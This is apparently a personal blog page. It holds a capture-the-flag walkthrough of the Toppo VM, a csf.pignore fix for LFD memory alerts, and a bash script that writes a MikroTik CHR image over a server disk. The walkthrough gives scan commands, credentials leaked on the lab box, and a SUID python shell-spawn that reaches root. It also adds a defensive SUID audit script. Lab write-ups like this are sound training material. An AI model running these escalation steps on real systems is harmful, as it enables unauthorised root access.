Friday, September 18, 2020

CTF Machine - Toppo

 ﷽

Machine : Toppo
Duration :  15-20 Minutes (approximately)

Meet Toppo ...

1. Preparation :

Check my own IP.
ifconfig


Discover neighbouring hosts' IPs.
nmap -sn 192.168.56.0/24


2. Enumeration :

nmap -sC -A -p- 192.168.56.105



Found several open ports: 22, 80, 111 & 58733. Let's try to browse the web server service (tcp/80) :

Also try to view the page source, looking for some interesting information, but no luck.


Meanwhile ... also look for any known exploits for the identified services :

OpenSSH 6.7P1 (tcp/22) :

Apache httpd 2.4.10 (tcp/80) :


Examine the web server : nikto -host http://192.168.56.105
Nikto found an admin directory and then a mail directory.


Accessing the admin directory, which has directory listing enabled :

Inside the admin directory we found a text file, notes.txt, which might contain user and password information.
Possible user and password information :
User : ted
Password : 12345ted123

Inside the mail directory, we found a .php file which only returns "No arguments Provided!".

Logging in with these credentials over the SSH service gives a low-privilege shell.


Identifying the system : uname -a and cat /etc/issue.net


Searching for SUID executables that user ted can run :
find / -perm -u=s 2>/dev/null


Python is a potential escalation vector, but first let's try using find.
find / -name sp8 -exec /bin/bash \; or find / -name sp8 -exec /bin/sh \;


The attempt using find failed, so let's try the well known python shell spawn.
We can use a python one-liner like python -c 'import pty; pty.spawn("/bin/sh")' or run it as a python script.
echo 'import pty; pty.spawn("/bin/sh")' > sp8.py
python sp8.py



And we got root; flag.txt can simply be found in the /root directory.
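The SUID search above is also the defender's check. As an added example (not part of the original write-up), this Python audits the output of `find / -perm -u=s` against a baseline of expected SUID binaries and flags interpreters and find, the two that gave root here; the sample find output, the baseline and the prefix list are constructed for illustration.

```python
import os
import stat

# Constructed sample output of `find / -perm -u=s 2>/dev/null` on a host in the
# same state as Toppo: a SUID python and find next to the normal setuid tools.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/python2.7
/usr/bin/find
/bin/su
/bin/mount
"""

# Constructed baseline of SUID paths expected on this host; in practice capture
# it from a freshly installed system or from the package manifests.
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount"}

# Name prefixes that must never carry the SUID bit: interpreters and find run
# whatever their caller asks, which is exactly how this box was rooted.
NEVER_SUID_PREFIXES = ("python", "perl", "find")


def parse_find_output(text):
    """Turn `find -perm -u=s` output into a sorted, de-duplicated path list."""
    return sorted({line.strip() for line in text.splitlines() if line.strip()})

def scan_suid(root="/"):
    """Live equivalent of the find command: every regular file under `root`
    whose mode has the SUID bit set (unreadable entries are skipped)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)

def audit_suid(paths, baseline=BASELINE):
    """Return the SUID paths absent from the baseline and, among those, the
    ones that are interpreters or find (fix first with `chmod u-s`)."""
    unexpected = sorted(set(paths) - set(baseline))
    dangerous = [p for p in unexpected
                 if os.path.basename(p).startswith(NEVER_SUID_PREFIXES)]
    return {"unexpected": unexpected, "dangerous": dangerous}
```

audit_suid(scan_suid()) runs the same check on the live filesystem; anything listed under dangerous should lose the bit with chmod u-s, and the remaining unexpected entries deserve a review.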

Finish ...

Thank you and Greets Hadi Mene.

Thursday, May 28, 2020

LFD on Excessive resource usage [FIX]

You may experience this issue if you run cPanel/WHM with LFD (Login Failure Daemon), which monitors server logs for failed login attempts and then takes action through CSF (ConfigServer Firewall).

The LFD service sends excessive resource usage alerts by email in the following common format :


Time:         Thu Dec 28 13:58:57 2019 +0700
Account:      sp8dovr
Resource:     RSS Memory Size
Exceeded:     258 > 256 (MB)
Executable:   /usr/local/cpanel/3rdparty/perl/524/bin/perl
Command Line: spamd child
PID:          4241 (Parent PID:26888)
Killed:       No 
 
We can quickly resolve this with the following steps :
 
1. Log in to your WHM.
2. Go to Server Configuration > Terminal.
3. Back up csf.pignore : cp /etc/csf/csf.pignore /etc/csf/csf.pignore.original
4. Edit csf.pignore : vi /etc/csf/csf.pignore
5. Take note of the Executable from the email notification.
   In this case the Executable is
   /usr/local/cpanel/3rdparty/perl/524/bin/perl
6. Based on the Executable from step 5, add this line to /etc/csf/csf.pignore :
   exe:/usr/local/cpanel/3rdparty/perl/.*/bin/perl
   The .* is a regex wildcard replacing 524, so the entry does not need to be
   changed whenever the perl version changes.
7. Lastly, restart LFD (ConfigServer Security & Firewall > lfd Restart)


Note :
Others have also reported the following executable variants :
cmd:spamd child 
exe:/usr/local/cpanel/3rdparty/perl/.*/bin/spamd
exe:/opt/cpanel/ea-php*/root/usr/sbin/php-fpm
exe:/usr/bin/gpg-agent 
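As an added example (not part of the original post), the Python below parses an alert in the format shown above, derives the version-agnostic pattern of step 6 from its Executable field, and checks which csf.pignore entry (including the cmd: form from the note) would cover the alert before lfd is restarted. It assumes the prefix semantics stated in the header comment of csf.pignore itself, where exe: and cmd: are literal matches and pexe: and pcmd: are Perl regular expressions, plus an anchored whole-string match; the sample alert is constructed from the format above.

```python
import re

# Constructed alert in the LFD "excessive resource usage" mail format
# (account, PIDs and time are made up).
SAMPLE_ALERT = """\
Time:         Thu Dec 28 13:58:57 2019 +0700
Account:      sp8dovr
Resource:     RSS Memory Size
Exceeded:     258 > 256 (MB)
Executable:   /usr/local/cpanel/3rdparty/perl/524/bin/perl
Command Line: spamd child
PID:          4241 (Parent PID:26888)
Killed:       No
"""

def parse_alert(text):
    """Split the alert into a {field: value} dict on the first colon of each line."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def version_agnostic_pattern(path):
    """Replace each purely numeric path component (the perl build dir 524 here)
    with `.*`, the same generalisation as step 6, and regex-escape the rest."""
    return "/".join(".*" if part.isdigit() else re.escape(part)
                    for part in path.split("/"))

def would_ignore(pignore_text, executable, cmdline=""):
    """Return the first csf.pignore entry covering the alert, or None. Prefix
    semantics follow csf.pignore's header comment: exe:/cmd: are literal,
    pexe:/pcmd: are Perl regexes (anchored whole-string match assumed)."""
    for raw in pignore_text.splitlines():
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        prefix, _sep, value = entry.partition(":")
        subject = {"exe": executable, "pexe": executable,
                   "cmd": cmdline, "pcmd": cmdline}.get(prefix)
        if subject is None:
            continue
        if prefix.startswith("p") and re.fullmatch(value, subject):
            return entry
        if not prefix.startswith("p") and value == subject:
            return entry
    return None
```

Run would_ignore over the contents of your edited /etc/csf/csf.pignore with the alert's Executable and Command Line; a None result means the entry will not silence that alert, and the header comment of your own csf.pignore tells you which prefix takes a regular expression.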
 


That's it ...

Saturday, February 22, 2020

Install Mikrotik CHR from Ubuntu

#!/bin/bash
#
# SP8-CHR-2-DO run on Ubuntu 16.04.6
# Replace password in RMDPWD
#
# Start a screen session first (screen) so a dropped SSH connection does not
# interrupt the run, then execute this script inside it. The script overwrites
# the target disk (/dev/vda) with the CHR image, so check that device name.
#
apt-get update ; apt install -y qemu-utils pv screen ; modprobe nbd ; mkdir -p /mtksrc ;
wget https://download.mikrotik.com/routeros/6.46.4/chr-6.46.4.img.zip -O CHR_SRC.zip
# gunzip can extract a single-member .zip archive
gunzip -c CHR_SRC.zip > CHR.img
qemu-img convert CHR.img -O qcow2 CHRS.qcow2
# Resize the image to 10G; check that this fits your existing target disk.
qemu-img resize CHRS.qcow2 10737418240
echo "Exporting disk image"
# Attach the qcow2 as a network block device so its first partition can be mounted
qemu-nbd -c /dev/nbd0  CHRS.qcow2
sleep 5
partprobe /dev/nbd0 ; mount /dev/nbd0p1 /mtksrc
#
# Current IPv4 address (with prefix length) and default gateway of eth0,
# carried over to RouterOS so the host stays reachable after the reboot.
IPADDR=`ip addr show eth0 | grep global | cut -d' ' -f 6 | head -n 1`
GW=`ip route list | grep default | cut -d' ' -f 3`
RMDPWD="My-Password"
# RouterOS runs rw/autorun.scr on first boot: set address, route and DNS,
# disable telnet and rename the default user with our password.
echo "/ip address add address=$IPADDR interface=[/interface ethernet find where name=ether1]
/ip route add gateway=$GW
/ip service disable telnet
/user set 0 name=root password=$RMDPWD
/ip dns set servers=1.1.1.1,8.8.8.8
/system package update install
 " > /mtksrc/rw/autorun.scr
umount /mtksrc
e2fsck -f -y /dev/nbd0p1 || true
resize2fs /dev/nbd0p1
sleep 1
echo "Image to GZip"
# Keep the compressed image in RAM: the disk it would live on is about to be overwritten
mount -t tmpfs tmpfs /mtksrc
pv /dev/nbd0 | gzip > /mtksrc/SP-CHR.gz
sleep 2
# Was $PASSWORD in the original, which is never set; RMDPWD is the variable used above
echo "Default password is : $RMDPWD"
echo "or try admin with no password"
sleep 1
# Remount all filesystems read-only before writing over the running system disk
echo u > /proc/sysrq-trigger
echo "Writing image, to target disk"
zcat /mtksrc/SP-CHR.gz | pv > /dev/vda
sleep 5
shutdown -r now
#Done

40 Hadiths on the Samawa Family (Part 3)

 ﷽ Ustadz Yusuf Abu Ubaidah As-Sidawi hafizahullohuta'ala, Masjid Al-Aziz, Jl. Soekarno Hatta No. 662 Bandung. Hadith 11 : Doa Orangtua Bu...